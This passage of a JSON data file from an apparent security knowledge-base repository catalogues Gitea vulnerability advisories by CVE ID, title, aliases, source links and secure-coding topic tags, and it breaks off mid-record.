hao/websafe-kb
1
0
派生 0
代码 工单 合并请求 1 工作流 软件包 项目 发布 百科 活动
文件
a3edc888346536acfe693aff55035bbcf53cf09e
websafe-kb/08-threat-intel/generated/dashboard/advisories.json

3195 行
175 KiB
JSON
原始文件 Blame 文件历史

{
"gitea--CVE-2021-29134": {
"canonical_id": "gitea--CVE-2021-29134",
"title": "Path Traversal in Gitea in code.gitea.io/gitea",
"summary": "Path Traversal in Gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T14:30:29Z",
"updated_at": "2026-03-03T04:50:06.638863Z",
"official_source_url": "https://github.com/advisories/GHSA-h3q4-vmw4-cpr5",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-29134",
"https://github.com/go-gitea/gitea/pull/15125/files",
"https://github.com/go-gitea/gitea/releases",
"https://github.com/go-gitea/gitea/releases/tag/v1.13.6"
],
"aliases": [
"BIT-gitea-2021-29134",
"CVE-2021-29134",
"GHSA-h3q4-vmw4-cpr5",
"GO-2022-0353"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"path-traversal-guard"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2021-3382": {
"canonical_id": "gitea--CVE-2021-3382",
"title": "Buffer Overflow in gitea in code.gitea.io/gitea",
"summary": "Buffer Overflow in gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-06-04T15:19:21Z",
"updated_at": "2026-03-03T04:55:15.307648Z",
"official_source_url": "https://github.com/advisories/GHSA-9f8c-pfvv-p4gm",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-3382",
"https://github.com/go-gitea/gitea/pull/14390"
],
"aliases": [
"BIT-gitea-2021-3382",
"CVE-2021-3382",
"GHSA-9f8c-pfvv-p4gm",
"GO-2024-2757"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2021-45327": {
"canonical_id": "gitea--CVE-2021-45327",
"title": "Capture-replay in Gitea in code.gitea.io/gitea",
"summary": "Capture-replay in Gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T14:30:26Z",
"updated_at": "2026-03-03T04:52:07.840324Z",
"official_source_url": "https://github.com/advisories/GHSA-jrpg-35hw-m4p9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-45327",
"https://blog.gitea.io/2020/03/gitea-1.11.2-is-released",
"https://github.com/go-gitea/gitea/commit/4cb18601ff33dda5edb47d5b452cc8f2dc39dd67",
"https://github.com/go-gitea/gitea/commit/6f5656ab0ebec03fe63898208dabc802c4be46ab",
"https://github.com/go-gitea/gitea/commit/ed664a9e1dae4d4660e60c981173bbc5102e69ea",
"https://github.com/go-gitea/gitea/pull/10462",
"https://github.com/go-gitea/gitea/pull/10465",
"https://github.com/go-gitea/gitea/pull/10582"
],
"aliases": [
"BIT-gitea-2021-45327",
"CVE-2021-45327",
"GHSA-jrpg-35hw-m4p9",
"GO-2022-0310"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2021-45330": {
"canonical_id": "gitea--CVE-2021-45330",
"title": "Improper Privilege Management in Gitea in code.gitea.io/gitea",
"summary": "Improper Privilege Management in Gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T16:03:21Z",
"updated_at": "2026-03-03T04:52:33.136607Z",
"official_source_url": "https://github.com/advisories/GHSA-pg38-r834-g45j",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-45330",
"https://github.com/go-gitea/gitea/issues/4336",
"https://github.com/go-gitea/gitea/pull/4840"
],
"aliases": [
"BIT-gitea-2021-45330",
"CVE-2021-45330",
"GHSA-pg38-r834-g45j",
"GO-2022-0982"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2021-45331": {
"canonical_id": "gitea--CVE-2021-45331",
"title": "Reuse of one time passwords allowed in Gitea in code.gitea.io/gitea",
"summary": "Reuse of one time passwords allowed in Gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T14:30:29Z",
"updated_at": "2026-03-03T04:52:07.604662Z",
"official_source_url": "https://github.com/advisories/GHSA-hfmf-q69j-6m5p",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-45331",
"https://blog.gitea.io/2018/08/gitea-1.5.0-is-released",
"https://github.com/go-gitea/gitea/pull/3878"
],
"aliases": [
"BIT-gitea-2021-45331",
"CVE-2021-45331",
"GHSA-hfmf-q69j-6m5p",
"GO-2022-0315"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-0905": {
"canonical_id": "gitea--CVE-2022-0905",
"title": "Gitea Missing Authorization vulnerability in code.gitea.io/gitea",
"summary": "Gitea Missing Authorization vulnerability in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T15:11:40Z",
"updated_at": "2026-03-03T04:50:45.472605Z",
"official_source_url": "https://github.com/advisories/GHSA-jr9c-h74f-2v28",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-0905",
"https://github.com/go-gitea/gitea/commit/1314f38b59748397b3429fb9bc9f9d6bac85d2f2",
"https://github.com/go-gitea/gitea/commit/3e5c844a7758fa29126d201f4f98bf21bca6d314",
"https://huntr.dev/bounties/8d221f92-b2b1-4878-bc31-66ff272e5ceb"
],
"aliases": [
"BIT-gitea-2022-0905",
"CVE-2022-0905",
"GHSA-jr9c-h74f-2v28",
"GO-2022-0609"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-1058": {
"canonical_id": "gitea--CVE-2022-1058",
"title": "Gitea Open Redirect in code.gitea.io/gitea",
"summary": "Gitea Open Redirect in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-06-04T15:19:21Z",
"updated_at": "2026-03-03T04:51:49.844240Z",
"official_source_url": "https://github.com/advisories/GHSA-4rqq-rxvc-v2rc",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-1058",
"https://github.com/go-gitea/gitea/commit/e3d8e92bdc67562783de9a76b5b7842b68daeb48",
"https://github.com/go-gitea/gitea/pull/19175",
"https://github.com/go-gitea/gitea/pull/19186",
"https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d"
],
"aliases": [
"BIT-gitea-2022-1058",
"CVE-2022-1058",
"GHSA-4rqq-rxvc-v2rc",
"GO-2024-2752"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-1928": {
"canonical_id": "gitea--CVE-2022-1928",
"title": "Stored Cross-site Scripting in gitea in code.gitea.io/gitea",
"summary": "Stored Cross-site Scripting in gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T15:11:40Z",
"updated_at": "2026-03-03T04:50:45.577318Z",
"official_source_url": "https://github.com/advisories/GHSA-ph3w-2843-72mx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-1928",
"https://github.com/go-gitea/gitea",
"https://github.com/go-gitea/gitea/commit/65e0688a5c9dacad50e71024b7529fdf0e3c2e9c",
"https://github.com/go-gitea/gitea/pull/19825",
"https://huntr.dev/bounties/6336ec42-5c4d-4f61-ae38-2bb539f433d2",
"https://security.gentoo.org/glsa/202210-14"
],
"aliases": [
"BIT-gitea-2022-1928",
"CVE-2022-1928",
"GHSA-ph3w-2843-72mx",
"GO-2022-0612"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"xss-output-encoding"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-27313": {
"canonical_id": "gitea--CVE-2022-27313",
"title": "Arbitrary file deletion in gitea in code.gitea.io/gitea",
"summary": "Arbitrary file deletion in gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T15:11:31Z",
"updated_at": "2026-03-03T04:50:19.647131Z",
"official_source_url": "https://github.com/advisories/GHSA-g7p7-x6w7-w6qg",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-27313",
"https://github.com/go-gitea/gitea/pull/19072",
"https://github.com/go-gitea/gitea/releases/tag/v1.16.4"
],
"aliases": [
"BIT-gitea-2022-27313",
"CVE-2022-27313",
"GHSA-g7p7-x6w7-w6qg",
"GO-2022-0442"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-30781": {
"canonical_id": "gitea--CVE-2022-30781",
"title": "Shell command injection in gitea in code.gitea.io/gitea",
"summary": "Shell command injection in gitea in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T15:11:31Z",
"updated_at": "2026-03-03T04:50:23.949796Z",
"official_source_url": "https://github.com/advisories/GHSA-p5f9-c9j9-g8qx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-30781",
"http://packetstormsecurity.com/files/168400/Gitea-1.16.6-Remote-Code-Execution.html",
"http://packetstormsecurity.com/files/169928/Gitea-Git-Fetch-Remote-Code-Execution.html",
"https://blog.gitea.io/2022/05/gitea-1.16.7-is-released",
"https://github.com/go-gitea/gitea/pull/19487",
"https://github.com/go-gitea/gitea/pull/19490"
],
"aliases": [
"BIT-gitea-2022-30781",
"CVE-2022-30781",
"GHSA-p5f9-c9j9-g8qx",
"GO-2022-0450"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-38183": {
"canonical_id": "gitea--CVE-2022-38183",
"title": "Gitea allowed assignment of private issues in code.gitea.io/gitea",
"summary": "Gitea allowed assignment of private issues in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-06-10T16:38:54Z",
"updated_at": "2026-03-03T04:55:04.505871Z",
"official_source_url": "https://github.com/advisories/GHSA-fhv8-m4j4-cww2",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-38183",
"https://blog.gitea.io/2022/07/gitea-1.16.9-is-released",
"https://github.com/go-gitea/gitea/pull/20133",
"https://github.com/go-gitea/gitea/pull/20196",
"https://herolab.usd.de/security-advisories/usd-2022-0015"
],
"aliases": [
"BIT-gitea-2022-38183",
"CVE-2022-38183",
"GHSA-fhv8-m4j4-cww2",
"GO-2024-2769"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-38795": {
"canonical_id": "gitea--CVE-2022-38795",
"title": "Gitea erroneous repo clones in code.gitea.io/gitea",
"summary": "Gitea erroneous repo clones in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T14:17:52Z",
"updated_at": "2026-03-03T04:54:07.076900Z",
"official_source_url": "https://github.com/advisories/GHSA-8j3v-68w3-3848",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-38795",
"https://blog.gitea.com/release-of-1.17.2",
"https://github.com/go-gitea/gitea/pull/20869",
"https://github.com/go-gitea/gitea/pull/20892"
],
"aliases": [
"BIT-gitea-2022-38795",
"CVE-2022-38795",
"GHSA-8j3v-68w3-3848",
"GO-2023-1999"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2022-42968": {
"canonical_id": "gitea--CVE-2022-42968",
"title": "Gitea vulnerable to Argument Injection in code.gitea.io/gitea",
"summary": "Gitea vulnerable to Argument Injection in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2024-08-21T16:03:24Z",
"updated_at": "2026-03-03T04:52:41.181693Z",
"official_source_url": "https://github.com/advisories/GHSA-w8xw-7crf-h23x",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-42968",
"https://github.com/go-gitea/gitea/pull/21463",
"https://github.com/go-gitea/gitea/releases/tag/v1.17.3",
"https://security.gentoo.org/glsa/202210-14"
],
"aliases": [
"BIT-gitea-2022-42968",
"CVE-2022-42968",
"GHSA-w8xw-7crf-h23x",
"GO-2022-1065"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68938": {
"canonical_id": "gitea--CVE-2025-68938",
"title": "Gitea mishandles authorization for deletion of releases in code.gitea.io/gitea",
"summary": "Gitea mishandles authorization for deletion of releases in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:49.095775Z",
"official_source_url": "https://github.com/advisories/GHSA-cm54-pfmc-xrwx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68938",
"https://blog.gitea.com/release-of-1.25.2",
"https://github.com/go-gitea/gitea/pull/36002/commits/d4262131b39899d9e9ee5caa2635c810d476e43f#diff-8962bac89952027d50fa51f31f59d65bedb4c02bde0265eced5cf256cbed306d",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.2"
],
"aliases": [
"BIT-gitea-2025-68938",
"CVE-2025-68938",
"GHSA-cm54-pfmc-xrwx",
"GO-2025-4258"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68941": {
"canonical_id": "gitea--CVE-2025-68941",
"title": "Gitea mishandles access to a private resource upon receiving an API token with scope limited to public resources in code.gitea.io/gitea",
"summary": "Gitea mishandles access to a private resource upon receiving an API token with scope limited to public resources in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:50.339953Z",
"official_source_url": "https://github.com/advisories/GHSA-xfq3-qj7j-4565",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68941",
"https://blog.gitea.com/release-of-1.22.3",
"https://github.com/go-gitea/gitea/pull/32218",
"https://github.com/go-gitea/gitea/releases/tag/v1.22.3"
],
"aliases": [
"BIT-gitea-2025-68941",
"CVE-2025-68941",
"GHSA-xfq3-qj7j-4565",
"GO-2025-4268"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68942": {
"canonical_id": "gitea--CVE-2025-68942",
"title": "Gitea allows XSS because the search input box (for creating tags and branches) is v-html instead of v-text in code.gitea.io/gitea",
"summary": "Gitea allows XSS because the search input box (for creating tags and branches) is v-html instead of v-text in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:49.781753Z",
"official_source_url": "https://github.com/advisories/GHSA-898p-hh3p-hf9r",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68942",
"https://blog.gitea.com/release-of-1.22.2",
"https://github.com/go-gitea/gitea/pull/31966",
"https://github.com/go-gitea/gitea/releases/tag/v1.22.2"
],
"aliases": [
"BIT-gitea-2025-68942",
"CVE-2025-68942",
"GHSA-898p-hh3p-hf9r",
"GO-2025-4263"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"xss-output-encoding"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68943": {
"canonical_id": "gitea--CVE-2025-68943",
"title": "Gitea inadvertently discloses users' login times by allowing (for example) the lastlogintime explore/users sort order in code.gitea.io/gitea",
"summary": "Gitea inadvertently discloses users' login times by allowing (for example) the lastlogintime explore/users sort order in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:49.213758Z",
"official_source_url": "https://github.com/advisories/GHSA-jhx5-4vr4-f327",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68943",
"https://blog.gitea.com/release-of-1.21.8-and-1.21.9-and-1.21.10",
"https://github.com/go-gitea/gitea/pull/29430",
"https://github.com/go-gitea/gitea/releases/tag/v1.21.8"
],
"aliases": [
"BIT-gitea-2025-68943",
"CVE-2025-68943",
"GHSA-jhx5-4vr4-f327",
"GO-2025-4266"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68944": {
"canonical_id": "gitea--CVE-2025-68944",
"title": "Gitea sometimes mishandles propagation of token scope for access control within one of its own package registries in code.gitea.io/gitea",
"summary": "Gitea sometimes mishandles propagation of token scope for access control within one of its own package registries in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:50.526913Z",
"official_source_url": "https://github.com/advisories/GHSA-f85h-c7m6-cfpm",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68944",
"https://blog.gitea.com/release-of-1.22.2",
"https://github.com/go-gitea/gitea/pull/31967",
"https://github.com/go-gitea/gitea/releases/tag/v1.22.2"
],
"aliases": [
"BIT-gitea-2025-68944",
"CVE-2025-68944",
"GHSA-f85h-c7m6-cfpm",
"GO-2025-4264"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68945": {
"canonical_id": "gitea--CVE-2025-68945",
"title": "Gitea: anonymous user can visit private user's project in code.gitea.io/gitea",
"summary": "Gitea: anonymous user can visit private user's project in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:51.457970Z",
"official_source_url": "https://github.com/advisories/GHSA-7xq4-mwcp-q8fx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68945",
"https://blog.gitea.com/release-of-1.21.2",
"https://github.com/go-gitea/gitea/pull/28423",
"https://github.com/go-gitea/gitea/releases/tag/v1.21.2"
],
"aliases": [
"BIT-gitea-2025-68945",
"CVE-2025-68945",
"GHSA-7xq4-mwcp-q8fx",
"GO-2025-4262"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-68946": {
"canonical_id": "gitea--CVE-2025-68946",
"title": "Gitea vulnerable to Cross-site Scripting in code.gitea.io/gitea",
"summary": "Gitea vulnerable to Cross-site Scripting in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:50.473303Z",
"official_source_url": "https://github.com/advisories/GHSA-hq57-c72x-4774",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68946",
"https://blog.gitea.com/release-of-1.20.1",
"https://github.com/go-gitea/gitea/pull/25960",
"https://github.com/go-gitea/gitea/releases/tag/v1.20.1"
],
"aliases": [
"BIT-gitea-2025-68946",
"CVE-2025-68946",
"GHSA-hq57-c72x-4774",
"GO-2025-4265"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"xss-output-encoding"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2025-69413": {
"canonical_id": "gitea--CVE-2025-69413",
"title": "Gitea's /api/v1/user endpoint has different responses for failed authentication depending on whether a username exists in code.gitea.io/gitea",
"summary": "Gitea's /api/v1/user endpoint has different responses for failed authentication depending on whether a username exists in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-01-12T17:39:39Z",
"updated_at": "2026-03-03T04:57:49.801641Z",
"official_source_url": "https://github.com/advisories/GHSA-pc73-rj2c-wvf9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-69413",
"https://blog.gitea.com/release-of-1.25.2",
"https://github.com/go-gitea/gitea/issues/35984",
"https://github.com/go-gitea/gitea/pull/36002",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.2"
],
"aliases": [
"BIT-gitea-2025-69413",
"CVE-2025-69413",
"GHSA-pc73-rj2c-wvf9",
"GO-2026-4274"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-0798": {
"canonical_id": "gitea--CVE-2026-0798",
"title": "Gitea may send release notification emails for private repositories to users whose access has been revoked in code.gitea.io/gitea",
"summary": "Gitea may send release notification emails for private repositories to users whose access has been revoked in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:54.518308Z",
"official_source_url": "https://github.com/advisories/GHSA-8fwc-qjw5-rvgp",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-0798",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/pull/36319",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-0798",
"CVE-2026-0798",
"GHSA-8fwc-qjw5-rvgp",
"GHSA-f4wq-6ww5-m56p",
"GO-2026-4365"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20736": {
"canonical_id": "gitea--CVE-2026-20736",
"title": "Gitea has improper access control for uploaded attachments in code.gitea.io/gitea",
"summary": "Gitea has improper access control for uploaded attachments in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:53.977351Z",
"official_source_url": "https://github.com/advisories/GHSA-hgr3-x44x-33hx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20736",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/fbea2c68e8df11cfa94e8ead913b79946780ed30",
"https://github.com/go-gitea/gitea/pull/36320",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20736",
"CVE-2026-20736",
"GHSA-hgr3-x44x-33hx",
"GHSA-jr6h-pwwp-c8g6",
"GO-2026-4367"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"file-upload-validation"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20750": {
"canonical_id": "gitea--CVE-2026-20750",
"title": "Gitea does not properly validate project ownership in organization project operations in code.gitea.io/gitea",
"summary": "Gitea does not properly validate project ownership in organization project operations in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:57.697708Z",
"official_source_url": "https://github.com/advisories/GHSA-rw22-5hhq-pfpf",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20750",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/7b5de594cd92e30b9c3d40ffda119acad794cc64",
"https://github.com/go-gitea/gitea/pull/36318",
"https://github.com/go-gitea/gitea/pull/36373",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20750",
"CVE-2026-20750",
"GHSA-h4fh-pc4w-8w27",
"GHSA-rw22-5hhq-pfpf",
"GO-2026-4370"
],
"secure_code_topics": [
